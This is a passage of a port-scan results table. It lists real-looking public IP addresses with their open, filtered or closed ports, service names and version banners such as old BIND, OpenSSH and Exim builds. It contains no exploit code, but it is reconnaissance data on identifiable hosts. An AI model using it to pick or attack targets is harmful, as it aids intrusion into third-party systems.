11039149.126.72.220 20053 tcp tcpwrapped open
11040149.126.72.220 20060 tcp tcpwrapped open
11041149.126.72.220 20070 tcp tcpwrapped open
11042149.126.72.220 20080 tcp tcpwrapped open
11043149.126.72.220 20082 tcp tcpwrapped open
11044149.126.72.220 20084 tcp tcpwrapped open
11045149.126.72.220 20090 tcp tcpwrapped open
11046149.126.72.220 20100 tcp tcpwrapped open
11047149.126.72.220 20106 tcp tcpwrapped open
11048149.126.72.220 20107 tcp tcpwrapped open
11049149.126.72.220 20110 tcp tcpwrapped open
11050149.126.72.220 20150 tcp tcpwrapped open
11051149.126.72.220 20182 tcp tcpwrapped open
11052149.126.72.220 20184 tcp tcpwrapped open
11053149.126.72.220 20185 tcp tcpwrapped open
11054149.126.72.220 20200 tcp tcpwrapped open
11055149.126.72.220 20208 tcp tcpwrapped open
11056149.126.72.220 20325 tcp tcpwrapped open
11057149.126.72.220 20500 tcp tcpwrapped open
11058149.126.72.220 20512 tcp tcpwrapped open
11059149.126.72.220 20600 tcp tcpwrapped open
11060149.126.72.220 20800 tcp tcpwrapped open
11061149.126.72.220 20892 tcp tcpwrapped open
11062149.126.72.220 20894 tcp tcpwrapped open
11063149.126.72.220 20900 tcp tcpwrapped open
11064149.126.72.220 21081 tcp tcpwrapped open
11065149.126.72.220 21082 tcp tcpwrapped open
11066149.126.72.220 21083 tcp tcpwrapped open
11067149.126.72.220 21084 tcp tcpwrapped open
11068149.126.72.220 21100 tcp tcpwrapped open
11069149.126.72.220 21200 tcp tcpwrapped open
11070149.126.72.220 21300 tcp tcpwrapped open
11071149.126.72.220 21357 tcp tcpwrapped open
11072149.126.72.220 21381 tcp tcpwrapped open
11073149.126.72.220 21400 tcp tcpwrapped open
11074149.126.72.220 21500 tcp tcpwrapped open
11075149.126.72.220 21935 tcp tcpwrapped open
11076149.126.72.220 22082 tcp tcpwrapped open
11077149.126.72.220 22084 tcp tcpwrapped open
11078149.126.72.220 22103 tcp tcpwrapped open
11079149.126.72.220 22107 tcp tcpwrapped open
11080149.126.72.220 22206 tcp tcpwrapped open
11081149.126.72.220 22345 tcp tcpwrapped open
11082149.126.72.220 22403 tcp tcpwrapped open
11083149.126.72.220 22609 tcp tcpwrapped open
11084149.126.72.220 22703 tcp tcpwrapped open
11085149.126.72.220 22705 tcp tcpwrapped open
11086149.126.72.220 23082 tcp tcpwrapped open
11087149.126.72.220 23084 tcp tcpwrapped open
11088149.126.72.220 23182 tcp tcpwrapped open
11089149.126.72.220 23184 tcp tcpwrapped open
11090149.126.72.220 24082 tcp tcpwrapped open
11091149.126.72.220 24084 tcp tcpwrapped open
11092149.126.72.220 24472 tcp tcpwrapped open
11093149.126.72.220 24510 tcp tcpwrapped open
11094149.126.72.220 25000 tcp tcpwrapped open
11095149.126.72.220 25001 tcp tcpwrapped open
11096149.126.72.220 25002 tcp tcpwrapped open
11097149.126.72.220 25003 tcp tcpwrapped open
11098149.126.72.220 25004 tcp tcpwrapped open
11099149.126.72.220 25005 tcp tcpwrapped open
11100149.126.72.220 25006 tcp tcpwrapped open
11101149.126.72.220 25007 tcp tcpwrapped open
11102149.126.72.220 25008 tcp tcpwrapped open
11103149.126.72.220 25009 tcp tcpwrapped open
11104149.126.72.220 25010 tcp tcpwrapped open
11105149.126.72.220 25082 tcp tcpwrapped open
11106149.126.72.220 25084 tcp tcpwrapped open
11107149.126.72.220 25782 tcp tcpwrapped open
11108149.126.72.220 25952 tcp tcpwrapped open
11109149.126.72.220 27571 tcp tcpwrapped open
11110149.126.72.220 28001 tcp tcpwrapped open
11111149.126.72.220 28080 tcp tcpwrapped open
11112149.126.72.220 28818 tcp tcpwrapped open
11113149.126.72.220 29798 tcp tcpwrapped open
11114149.126.72.220 29799 tcp tcpwrapped open
11115149.126.72.220 30000 tcp tcpwrapped open
11116149.126.72.220 30001 tcp tcpwrapped open
11117149.126.72.220 30003 tcp tcpwrapped open
11118149.126.72.220 30005 tcp tcpwrapped open
11119149.126.72.220 30007 tcp tcpwrapped open
11120149.126.72.220 30009 tcp tcpwrapped open
11121149.126.72.220 30011 tcp tcpwrapped open
11122149.126.72.220 30013 tcp tcpwrapped open
11123149.126.72.220 30015 tcp tcpwrapped open
11124149.126.72.220 30017 tcp tcpwrapped open
11125149.126.72.220 30019 tcp tcpwrapped open
11126149.126.72.220 30021 tcp tcpwrapped open
11127149.126.72.220 30050 tcp tcpwrapped open
11128149.126.72.220 30106 tcp tcpwrapped open
11129149.126.72.220 30110 tcp tcpwrapped open
11130149.126.72.220 30111 tcp tcpwrapped open
11131149.126.72.220 30112 tcp tcpwrapped open
11132149.126.72.220 30113 tcp tcpwrapped open
11133149.126.72.220 30120 tcp tcpwrapped open
11134149.126.72.220 30121 tcp tcpwrapped open
11135149.126.72.220 30122 tcp tcpwrapped open
11136149.126.72.220 30123 tcp tcpwrapped open
11137149.126.72.220 30452 tcp tcpwrapped open
11138149.126.72.220 30468 tcp tcpwrapped open
11139149.126.72.220 30473 tcp tcpwrapped open
11140149.126.72.220 30479 tcp tcpwrapped open
11141149.126.72.220 30501 tcp tcpwrapped open
11142149.126.72.220 30700 tcp tcpwrapped open
11143149.126.72.220 30701 tcp tcpwrapped open
11144149.126.72.220 30892 tcp tcpwrapped open
11145149.126.72.220 30894 tcp tcpwrapped open
11146149.126.72.220 31337 tcp tcpwrapped open
11147149.126.72.220 32101 tcp tcpwrapped open
11148149.126.72.220 32102 tcp tcpwrapped open
11149149.126.72.220 32202 tcp tcpwrapped open
11150149.126.72.220 32303 tcp tcpwrapped open
11151149.126.72.220 32443 tcp tcpwrapped open
11152149.126.72.220 32444 tcp tcpwrapped open
11153149.126.72.220 32746 tcp tcpwrapped open
11154149.126.72.220 32800 tcp tcpwrapped open
11155149.126.72.220 34225 tcp tcpwrapped open
11156149.126.72.220 34500 tcp tcpwrapped open
11157149.126.72.220 35522 tcp tcpwrapped open
11158149.126.72.220 35524 tcp tcpwrapped open
11159149.126.72.220 35531 tcp tcpwrapped open
11160149.126.72.220 35554 tcp tcpwrapped open
11161149.126.72.220 35559 tcp tcpwrapped open
11162149.126.72.220 35560 tcp tcpwrapped open
11163149.126.72.220 36982 tcp tcpwrapped open
11164149.126.72.220 36983 tcp tcpwrapped open
11165149.126.72.220 36984 tcp tcpwrapped open
11166149.126.72.220 37080 tcp tcpwrapped open
11167149.126.72.220 38880 tcp tcpwrapped open
11168149.126.72.220 39001 tcp tcpwrapped open
11169149.126.72.220 40070 tcp tcpwrapped open
11170149.126.72.220 40099 tcp tcpwrapped open
11171149.126.72.220 40892 tcp tcpwrapped open
11172149.126.72.220 40894 tcp tcpwrapped open
11173149.126.72.220 42208 tcp tcpwrapped open
11174149.126.72.220 42424 tcp tcpwrapped open
11175149.126.72.220 42901 tcp tcpwrapped open
11176149.126.72.220 43008 tcp tcpwrapped open
11177149.126.72.220 43009 tcp tcpwrapped open
11178149.126.72.220 43200 tcp tcpwrapped open
11179149.126.72.220 44100 tcp tcpwrapped open
11180149.126.72.220 44300 tcp tcpwrapped open
11181149.126.72.220 44301 tcp tcpwrapped open
11182149.126.72.220 44302 tcp tcpwrapped open
11183149.126.72.220 44303 tcp tcpwrapped open
11184149.126.72.220 44304 tcp tcpwrapped open
11185149.126.72.220 44305 tcp tcpwrapped open
11186149.126.72.220 44306 tcp tcpwrapped open
11187149.126.72.220 44307 tcp tcpwrapped open
11188149.126.72.220 44308 tcp tcpwrapped open
11189149.126.72.220 44309 tcp tcpwrapped open
11190149.126.72.220 44310 tcp tcpwrapped open
11191149.126.72.220 44320 tcp tcpwrapped open
11192149.126.72.220 44332 tcp tcpwrapped open
11193149.126.72.220 44333 tcp tcpwrapped open
11194149.126.72.220 44334 tcp tcpwrapped open
11195149.126.72.220 44336 tcp tcpwrapped open
11196149.126.72.220 44337 tcp tcpwrapped open
11197149.126.72.220 44340 tcp tcpwrapped open
11198149.126.72.220 44341 tcp tcpwrapped open
11199149.126.72.220 44345 tcp tcpwrapped open
11200149.126.72.220 44400 tcp tcpwrapped open
11201149.126.72.220 44410 tcp tcpwrapped open
11202149.126.72.220 44420 tcp tcpwrapped open
11203149.126.72.220 45000 tcp tcpwrapped open
11204149.126.72.220 45555 tcp tcpwrapped open
11205149.126.72.220 45666 tcp tcpwrapped open
11206149.126.72.220 45667 tcp tcpwrapped open
11207149.126.72.220 45668 tcp tcpwrapped open
11208149.126.72.220 45677 tcp tcpwrapped open
11209149.126.72.220 45777 tcp tcpwrapped open
11210149.126.72.220 45788 tcp tcpwrapped open
11211149.126.72.220 45821 tcp tcpwrapped open
11212149.126.72.220 45886 tcp tcpwrapped open
11213149.126.72.220 45888 tcp tcpwrapped open
11214149.126.72.220 46000 tcp tcpwrapped open
11215149.126.72.220 46443 tcp tcpwrapped open
11216149.126.72.220 46862 tcp tcpwrapped open
11217149.126.72.220 47000 tcp tcpwrapped open
11218149.126.72.220 47080 tcp tcpwrapped open
11219149.126.72.220 47534 tcp tcpwrapped open
11220149.126.72.220 48888 tcp tcpwrapped open
11221149.126.72.220 48889 tcp tcpwrapped open
11222149.126.72.220 49200 tcp tcpwrapped open
11223149.126.72.220 49210 tcp tcpwrapped open
11224149.126.72.220 49443 tcp tcpwrapped open
11225149.126.72.220 49682 tcp tcpwrapped open
11226149.126.72.220 49684 tcp tcpwrapped open
11227149.126.72.220 49686 tcp tcpwrapped open
11228149.126.72.220 49688 tcp tcpwrapped open
11229149.126.72.220 49690 tcp tcpwrapped open
11230149.126.72.220 49692 tcp tcpwrapped open
11231149.126.72.220 49694 tcp tcpwrapped open
11232149.126.72.220 50000 tcp tcpwrapped open
11233149.126.72.220 50001 tcp tcpwrapped open
11234149.126.72.220 50042 tcp tcpwrapped open
11235149.126.72.220 50050 tcp tcpwrapped open
11236149.126.72.220 50073 tcp tcpwrapped open
11237149.126.72.220 50085 tcp tcpwrapped open
11238149.126.72.220 50101 tcp tcpwrapped open
11239149.126.72.220 50102 tcp tcpwrapped open
11240149.126.72.220 50103 tcp tcpwrapped open
11241149.126.72.220 50104 tcp tcpwrapped open
11242149.126.72.220 50105 tcp tcpwrapped open
11243149.126.72.220 50106 tcp tcpwrapped open
11244149.126.72.220 50107 tcp tcpwrapped open
11245149.126.72.220 50112 tcp tcpwrapped open
11246149.126.72.220 50113 tcp tcpwrapped open
11247149.126.72.220 50122 tcp tcpwrapped open
11248149.126.72.220 50160 tcp tcpwrapped open
11249149.126.72.220 50443 tcp tcpwrapped open
11250149.126.72.220 51002 tcp tcpwrapped open
11251149.126.72.220 51003 tcp tcpwrapped open
11252149.126.72.220 51434 tcp tcpwrapped open
11253149.126.72.220 52010 tcp tcpwrapped open
11254149.126.72.220 52230 tcp tcpwrapped open
11255149.126.72.220 52311 tcp tcpwrapped open
11256149.126.72.220 52536 tcp tcpwrapped open
11257149.126.72.220 53480 tcp tcpwrapped open
11258149.126.72.220 53481 tcp tcpwrapped open
11259149.126.72.220 53482 tcp tcpwrapped open
11260149.126.72.220 53483 tcp tcpwrapped open
11261149.126.72.220 53484 tcp tcpwrapped open
11262149.126.72.220 53485 tcp tcpwrapped open
11263149.126.72.220 53490 tcp tcpwrapped open
11264149.126.72.220 53805 tcp tcpwrapped open
11265149.126.72.220 53806 tcp tcpwrapped open
11266149.126.72.220 54327 tcp tcpwrapped open
11267149.126.72.220 54490 tcp tcpwrapped open
11268149.126.72.220 54545 tcp tcpwrapped open
11269149.126.72.220 55055 tcp tcpwrapped open
11270149.126.72.220 55080 tcp tcpwrapped open
11271149.126.72.220 55081 tcp tcpwrapped open
11272149.126.72.220 55350 tcp tcpwrapped open
11273149.126.72.220 55388 tcp tcpwrapped open
11274149.126.72.220 55470 tcp tcpwrapped open
11275149.126.72.220 55475 tcp tcpwrapped open
11276149.126.72.220 55481 tcp tcpwrapped open
11277149.126.72.220 55490 tcp tcpwrapped open
11278149.126.72.220 57778 tcp tcpwrapped open
11279149.126.72.220 57779 tcp tcpwrapped open
11280149.126.72.220 57780 tcp tcpwrapped open
11281149.126.72.220 57781 tcp tcpwrapped open
11282149.126.72.220 57782 tcp tcpwrapped open
11283149.126.72.220 57783 tcp tcpwrapped open
11284149.126.72.220 57784 tcp tcpwrapped open
11285149.126.72.220 57785 tcp tcpwrapped open
11286149.126.72.220 57786 tcp tcpwrapped open
11287149.126.72.220 57787 tcp tcpwrapped open
11288149.126.72.220 57788 tcp tcpwrapped open
11289149.126.72.220 58443 tcp tcpwrapped open
11290149.126.72.220 58585 tcp tcpwrapped open
11291149.126.72.220 59012 tcp tcpwrapped open
11292149.126.72.220 59443 tcp tcpwrapped open
11293149.126.72.220 60021 tcp tcpwrapped open
11294149.126.72.220 60023 tcp tcpwrapped open
11295149.126.72.220 60443 tcp tcpwrapped open
11296149.126.72.220 62080 tcp tcpwrapped open
11297149.126.72.220 62237 tcp tcpwrapped open
11298149.126.72.220 62443 tcp tcpwrapped open
11299149.126.72.220 62865 tcp tcpwrapped open
11300149.126.72.220 63443 tcp tcpwrapped open
11301149.126.72.220 64477 tcp tcpwrapped open
11302149.126.72.220 64671 tcp tcpwrapped open
11303151.106.38.107 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 12:11. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
11304151.106.38.107 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
11305151.106.38.107 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
11306151.106.38.107 67 tcp dhcps filtered
11307151.106.38.107 67 udp dhcps unknown
11308151.106.38.107 68 tcp dhcpc filtered
11309151.106.38.107 68 udp dhcpc unknown
11310151.106.38.107 69 tcp tftp filtered
11311151.106.38.107 69 udp tftp unknown
11312151.106.38.107 88 tcp kerberos-sec filtered
11313151.106.38.107 88 udp kerberos-sec unknown
11314151.106.38.107 123 tcp ntp filtered
11315151.106.38.107 123 udp ntp unknown
11316151.106.38.107 137 tcp netbios-ns filtered
11317151.106.38.107 137 udp netbios-ns unknown
11318151.106.38.107 138 tcp netbios-dgm filtered
11319151.106.38.107 138 udp netbios-dgm unknown
11320151.106.38.107 139 tcp netbios-ssn filtered
11321151.106.38.107 139 udp netbios-ssn unknown
11322151.106.38.107 161 tcp snmp filtered
11323151.106.38.107 161 udp snmp unknown
11324151.106.38.107 162 tcp snmptrap filtered
11325151.106.38.107 162 udp snmptrap unknown
11326151.106.38.107 389 tcp ldap filtered
11327151.106.38.107 389 udp ldap unknown
11328151.106.38.107 520 tcp efs filtered
11329151.106.38.107 520 udp route unknown
11330151.106.38.107 2049 tcp nfs filtered
11331151.106.38.107 2049 udp nfs unknown
11332158.69.13.254 22 tcp ssh open OpenSSH 7.4 protocol 2.0
11333158.69.13.254 25 tcp smtp open Exim smtpd 4.92.3
11334158.69.13.254 53 tcp domain open unknown banner: get lost
11335158.69.13.254 53 udp domain open unknown banner: get lost
11336158.69.13.254 67 tcp dhcps filtered
11337158.69.13.254 67 udp dhcps unknown
11338158.69.13.254 68 tcp dhcpc filtered
11339158.69.13.254 68 udp dhcpc unknown
11340158.69.13.254 69 tcp tftp filtered
11341158.69.13.254 69 udp tftp unknown
11342158.69.13.254 80 tcp http open nginx
11343158.69.13.254 88 tcp kerberos-sec filtered
11344158.69.13.254 88 udp kerberos-sec unknown
11345158.69.13.254 123 tcp ntp filtered
11346158.69.13.254 123 udp ntp unknown
11347158.69.13.254 137 tcp netbios-ns filtered
11348158.69.13.254 137 udp netbios-ns unknown
11349158.69.13.254 138 tcp netbios-dgm filtered
11350158.69.13.254 138 udp netbios-dgm unknown
11351158.69.13.254 139 tcp netbios-ssn filtered
11352158.69.13.254 139 udp netbios-ssn unknown
11353158.69.13.254 161 tcp snmp filtered
11354158.69.13.254 161 udp snmp unknown
11355158.69.13.254 162 tcp snmptrap filtered
11356158.69.13.254 162 udp snmptrap unknown
11357158.69.13.254 389 tcp ldap filtered
11358158.69.13.254 389 udp ldap unknown
11359158.69.13.254 443 tcp ssl/http open nginx
11360158.69.13.254 465 tcp ssl/smtp open Exim smtpd 4.92.3
11361158.69.13.254 520 tcp efs filtered
11362158.69.13.254 520 udp route unknown
11363158.69.13.254 587 tcp smtp open Exim smtpd 4.92.3
11364158.69.13.254 2049 tcp nfs filtered
11365158.69.13.254 2049 udp nfs unknown
11366158.69.13.254 2525 tcp smtp open Exim smtpd 4.92.3
11367158.69.13.254 3306 tcp mysql open MySQL blocked - too many connection errors
11368162.244.35.13 22 tcp ssh open SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
11369162.244.35.13 25 tcp open
11370162.244.35.13 53 tcp domain open ISC BIND 9.10.6
11371162.244.35.13 53 udp domain open ISC BIND 9.10.6
11372162.244.35.13 67 tcp dhcps closed
11373162.244.35.13 67 udp dhcps closed
11374162.244.35.13 68 tcp dhcpc closed
11375162.244.35.13 68 udp dhcpc closed
11376162.244.35.13 69 tcp tftp closed
11377162.244.35.13 69 udp tftp closed
11378162.244.35.13 88 tcp kerberos-sec closed
11379162.244.35.13 88 udp kerberos-sec closed
11380162.244.35.13 123 tcp ntp closed
11381162.244.35.13 123 udp ntp closed
11382162.244.35.13 137 tcp netbios-ns filtered
11383162.244.35.13 137 udp netbios-ns unknown
11384162.244.35.13 138 tcp netbios-dgm filtered
11385162.244.35.13 138 udp netbios-dgm unknown
11386162.244.35.13 139 tcp netbios-ssn filtered
11387162.244.35.13 139 udp netbios-ssn unknown
11388162.244.35.13 161 tcp snmp closed
11389162.244.35.13 161 udp snmp closed
11390162.244.35.13 162 tcp snmptrap closed
11391162.244.35.13 162 udp snmptrap closed
11392162.244.35.13 389 tcp ldap closed
11393162.244.35.13 389 udp ldap closed
11394162.244.35.13 520 tcp efs closed
11395162.244.35.13 520 udp route closed
11396162.244.35.13 2049 tcp nfs closed
11397162.244.35.13 2049 udp nfs closed
11398169.239.218.20 25 tcp smtp closed
11399169.239.218.20 53 tcp domain filtered
11400169.239.218.20 53 udp domain unknown
11401169.239.218.20 67 tcp dhcps filtered
11402169.239.218.20 67 udp dhcps unknown
11403169.239.218.20 68 tcp dhcpc filtered
11404169.239.218.20 68 udp dhcpc unknown
11405169.239.218.20 69 tcp tftp filtered
11406169.239.218.20 69 udp tftp unknown
11407169.239.218.20 88 tcp kerberos-sec filtered
11408169.239.218.20 88 udp kerberos-sec unknown
11409169.239.218.20 113 tcp ident closed
11410169.239.218.20 123 tcp ntp filtered
11411169.239.218.20 123 udp ntp unknown
11412169.239.218.20 137 tcp netbios-ns filtered
11413169.239.218.20 137 udp netbios-ns filtered
11414169.239.218.20 138 tcp netbios-dgm filtered
11415169.239.218.20 138 udp netbios-dgm filtered
11416169.239.218.20 139 tcp netbios-ssn closed
11417169.239.218.20 139 udp netbios-ssn unknown
11418169.239.218.20 161 tcp snmp filtered
11419169.239.218.20 161 udp snmp unknown
11420169.239.218.20 162 tcp snmptrap filtered
11421169.239.218.20 162 udp snmptrap unknown
11422169.239.218.20 389 tcp ldap filtered
11423169.239.218.20 389 udp ldap unknown
11424169.239.218.20 445 tcp microsoft-ds closed
11425169.239.218.20 520 tcp efs filtered
11426169.239.218.20 520 udp route unknown
11427169.239.218.20 2049 tcp nfs filtered
11428169.239.218.20 2049 udp nfs unknown
11429169.239.218.20 8008 tcp tcpwrapped open
11430173.214.244.169 53 tcp domain filtered
11431173.214.244.169 53 udp domain unknown
11432173.214.244.169 67 tcp dhcps filtered
11433173.214.244.169 67 udp dhcps unknown
11434173.214.244.169 68 tcp dhcpc filtered
11435173.214.244.169 68 udp dhcpc unknown
11436173.214.244.169 69 tcp tftp filtered
11437173.214.244.169 69 udp tftp unknown
11438173.214.244.169 88 tcp kerberos-sec filtered
11439173.214.244.169 88 udp kerberos-sec unknown
11440173.214.244.169 123 tcp ntp filtered
11441173.214.244.169 123 udp ntp unknown
11442173.214.244.169 137 tcp netbios-ns filtered
11443173.214.244.169 137 udp netbios-ns unknown
11444173.214.244.169 138 tcp netbios-dgm filtered
11445173.214.244.169 138 udp netbios-dgm unknown
11446173.214.244.169 139 tcp netbios-ssn filtered
11447173.214.244.169 139 udp netbios-ssn unknown
11448173.214.244.169 161 tcp snmp filtered
11449173.214.244.169 161 udp snmp unknown
11450173.214.244.169 162 tcp snmptrap filtered
11451173.214.244.169 162 udp snmptrap unknown
11452173.214.244.169 389 tcp ldap filtered
11453173.214.244.169 389 udp ldap unknown
11454173.214.244.169 520 tcp efs filtered
11455173.214.244.169 520 udp route unknown
11456173.214.244.169 2049 tcp nfs filtered
11457173.214.244.169 2049 udp nfs unknown
11458174.142.53.51 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 13:59. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
11459174.142.53.51 22 tcp ssh open SSH-2.0-OpenSSH_7.4
11460174.142.53.51 25 tcp smtp closed
11461174.142.53.51 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
11462174.142.53.51 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
11463174.142.53.51 67 tcp dhcps filtered
11464174.142.53.51 67 udp dhcps unknown
11465174.142.53.51 68 tcp dhcpc filtered
11466174.142.53.51 68 udp dhcpc unknown
11467174.142.53.51 69 tcp tftp filtered
11468174.142.53.51 69 udp tftp unknown
11469174.142.53.51 88 tcp kerberos-sec filtered
11470174.142.53.51 88 udp kerberos-sec unknown
11471174.142.53.51 123 tcp ntp filtered
11472174.142.53.51 123 udp ntp unknown
11473174.142.53.51 137 tcp netbios-ns filtered
11474174.142.53.51 137 udp netbios-ns filtered
11475174.142.53.51 138 tcp netbios-dgm filtered
11476174.142.53.51 138 udp netbios-dgm filtered
11477174.142.53.51 139 tcp netbios-ssn closed
11478174.142.53.51 139 udp netbios-ssn unknown
11479174.142.53.51 161 tcp snmp filtered
11480174.142.53.51 161 udp snmp unknown
11481174.142.53.51 162 tcp snmptrap filtered
11482174.142.53.51 162 udp snmptrap unknown
11483174.142.53.51 389 tcp ldap filtered
11484174.142.53.51 389 udp ldap unknown
11485174.142.53.51 445 tcp microsoft-ds closed
11486174.142.53.51 520 tcp efs filtered
11487174.142.53.51 520 udp route unknown
11488174.142.53.51 2049 tcp nfs filtered
11489174.142.53.51 2049 udp nfs unknown
11490190.98.209.37 53 tcp domain filtered
11491190.98.209.37 53 udp domain unknown
11492190.98.209.37 67 tcp dhcps filtered
11493190.98.209.37 67 udp dhcps unknown
11494190.98.209.37 68 tcp dhcpc filtered
11495190.98.209.37 68 udp dhcpc unknown
11496190.98.209.37 69 tcp tftp filtered
11497190.98.209.37 69 udp tftp unknown
11498190.98.209.37 88 tcp kerberos-sec filtered
11499190.98.209.37 88 udp kerberos-sec unknown
11500190.98.209.37 123 tcp ntp filtered
11501190.98.209.37 123 udp ntp unknown
11502190.98.209.37 137 tcp netbios-ns filtered
11503190.98.209.37 137 udp netbios-ns unknown
11504190.98.209.37 138 tcp netbios-dgm filtered
11505190.98.209.37 138 udp netbios-dgm unknown
11506190.98.209.37 139 tcp netbios-ssn filtered
11507190.98.209.37 139 udp netbios-ssn unknown
11508190.98.209.37 161 tcp snmp filtered
11509190.98.209.37 161 udp snmp unknown
11510190.98.209.37 162 tcp snmptrap filtered
11511190.98.209.37 162 udp snmptrap unknown
11512190.98.209.37 389 tcp ldap filtered
11513190.98.209.37 389 udp ldap unknown
11514190.98.209.37 520 tcp efs filtered
11515190.98.209.37 520 udp route unknown
11516190.98.209.37 2049 tcp nfs filtered
11517190.98.209.37 2049 udp nfs unknown
11518190.153.209.187 53 tcp domain filtered
11519190.153.209.187 53 udp domain unknown
11520190.153.209.187 67 tcp dhcps filtered
11521190.153.209.187 67 udp dhcps unknown
11522190.153.209.187 68 tcp dhcpc filtered
11523190.153.209.187 68 udp dhcpc unknown
11524190.153.209.187 69 tcp tftp filtered
11525190.153.209.187 69 udp tftp unknown
11526190.153.209.187 88 tcp kerberos-sec filtered
11527190.153.209.187 88 udp kerberos-sec unknown
11528190.153.209.187 123 tcp ntp filtered
11529190.153.209.187 123 udp ntp unknown
11530190.153.209.187 137 tcp netbios-ns filtered
11531190.153.209.187 137 udp netbios-ns unknown
11532190.153.209.187 138 tcp netbios-dgm filtered
11533190.153.209.187 138 udp netbios-dgm unknown
11534190.153.209.187 139 tcp netbios-ssn filtered
11535190.153.209.187 139 udp netbios-ssn unknown
11536190.153.209.187 161 tcp snmp filtered
11537190.153.209.187 161 udp snmp unknown
11538190.153.209.187 162 tcp snmptrap filtered
11539190.153.209.187 162 udp snmptrap unknown
11540190.153.209.187 389 tcp ldap filtered
11541190.153.209.187 389 udp ldap unknown
11542190.153.209.187 520 tcp efs filtered
11543190.153.209.187 520 udp route unknown
11544190.153.209.187 2049 tcp nfs filtered
11545190.153.209.187 2049 udp nfs unknown
11546190.153.219.254 22 tcp ssh open SSH-2.0-OpenSSH_7.4
11547190.153.219.254 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
11548190.153.219.254 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
11549190.153.219.254 67 tcp dhcps filtered
11550190.153.219.254 67 udp dhcps unknown
11551190.153.219.254 68 tcp dhcpc filtered
11552190.153.219.254 68 udp dhcpc unknown
11553190.153.219.254 69 tcp tftp filtered
11554190.153.219.254 69 udp tftp unknown
11555190.153.219.254 88 tcp kerberos-sec filtered
11556190.153.219.254 88 udp kerberos-sec unknown
11557190.153.219.254 123 tcp ntp filtered
11558190.153.219.254 123 udp ntp unknown
11559190.153.219.254 137 tcp netbios-ns filtered
11560190.153.219.254 137 udp netbios-ns unknown
11561190.153.219.254 138 tcp netbios-dgm filtered
11562190.153.219.254 138 udp netbios-dgm unknown
11563190.153.219.254 139 tcp netbios-ssn filtered
11564190.153.219.254 139 udp netbios-ssn unknown
11565190.153.219.254 161 tcp snmp filtered
11566190.153.219.254 161 udp snmp unknown
11567190.153.219.254 162 tcp snmptrap filtered
11568190.153.219.254 162 udp snmptrap unknown
11569190.153.219.254 389 tcp ldap filtered
11570190.153.219.254 389 udp ldap unknown
11571190.153.219.254 520 tcp efs filtered
11572190.153.219.254 520 udp route unknown
11573190.153.219.254 2049 tcp nfs filtered
11574190.153.219.254 2049 udp nfs unknown
11575200.73.54.34 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
11576200.73.54.34 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
11577200.73.54.34 67 tcp dhcps filtered
11578200.73.54.34 67 udp dhcps unknown
11579200.73.54.34 68 tcp dhcpc filtered
11580200.73.54.34 68 udp dhcpc unknown
11581200.73.54.34 69 tcp tftp filtered
11582200.73.54.34 69 udp tftp unknown
11583200.73.54.34 88 tcp kerberos-sec filtered
11584200.73.54.34 88 udp kerberos-sec unknown
11585200.73.54.34 123 tcp ntp filtered
11586200.73.54.34 123 udp ntp unknown
11587200.73.54.34 137 tcp netbios-ns filtered
11588200.73.54.34 137 udp netbios-ns unknown
11589200.73.54.34 138 tcp netbios-dgm filtered
11590200.73.54.34 138 udp netbios-dgm unknown
11591200.73.54.34 139 tcp netbios-ssn filtered
11592200.73.54.34 139 udp netbios-ssn unknown
11593200.73.54.34 161 tcp snmp filtered
11594200.73.54.34 161 udp snmp unknown
11595200.73.54.34 162 tcp snmptrap filtered
11596200.73.54.34 162 udp snmptrap unknown
11597200.73.54.34 389 tcp ldap filtered
11598200.73.54.34 389 udp ldap unknown
11599200.73.54.34 520 tcp efs filtered
11600200.73.54.34 520 udp route unknown
11601200.73.54.34 2049 tcp nfs filtered
11602200.73.54.34 2049 udp nfs unknown
11603204.93.193.141 21 tcp ftp open Your connection to this server has been blocked.\x0d\x0a\x0d\x0aYou are most likely being blocked due to use of incorrect user/pass combination. Please, check all of your computers/devices to make sure that they are using the correct login credentials, including your email clients. You may also get blocked due to too many POP3/IMAP logins in 1 minute interval, please adjust your email client settings.\x0d\x0a
11604204.93.193.141 53 tcp domain filtered
11605204.93.193.141 53 udp domain unknown
11606204.93.193.141 67 tcp dhcps filtered
11607204.93.193.141 67 udp dhcps unknown
11608204.93.193.141 68 tcp dhcpc filtered
11609204.93.193.141 68 udp dhcpc unknown
11610204.93.193.141 69 tcp tftp filtered
11611204.93.193.141 69 udp tftp unknown
11612204.93.193.141 88 tcp kerberos-sec filtered
11613204.93.193.141 88 udp kerberos-sec unknown
11614204.93.193.141 123 tcp ntp filtered
11615204.93.193.141 123 udp ntp unknown
11616204.93.193.141 137 tcp netbios-ns filtered
11617204.93.193.141 137 udp netbios-ns unknown
11618204.93.193.141 138 tcp netbios-dgm filtered
11619204.93.193.141 138 udp netbios-dgm unknown
11620204.93.193.141 139 tcp netbios-ssn filtered
11621204.93.193.141 139 udp netbios-ssn unknown
11622204.93.193.141 161 tcp snmp filtered
11623204.93.193.141 161 udp snmp unknown
11624204.93.193.141 162 tcp snmptrap filtered
11625204.93.193.141 162 udp snmptrap unknown
11626204.93.193.141 389 tcp ldap filtered
11627204.93.193.141 389 udp ldap unknown
11628204.93.193.141 520 tcp efs filtered
11629204.93.193.141 520 udp route unknown
11630204.93.193.141 2049 tcp nfs filtered
11631204.93.193.141 2049 udp nfs unknown
11632206.48.140.40 53 tcp domain filtered
11633206.48.140.40 53 udp domain unknown
11634206.48.140.40 67 tcp dhcps filtered
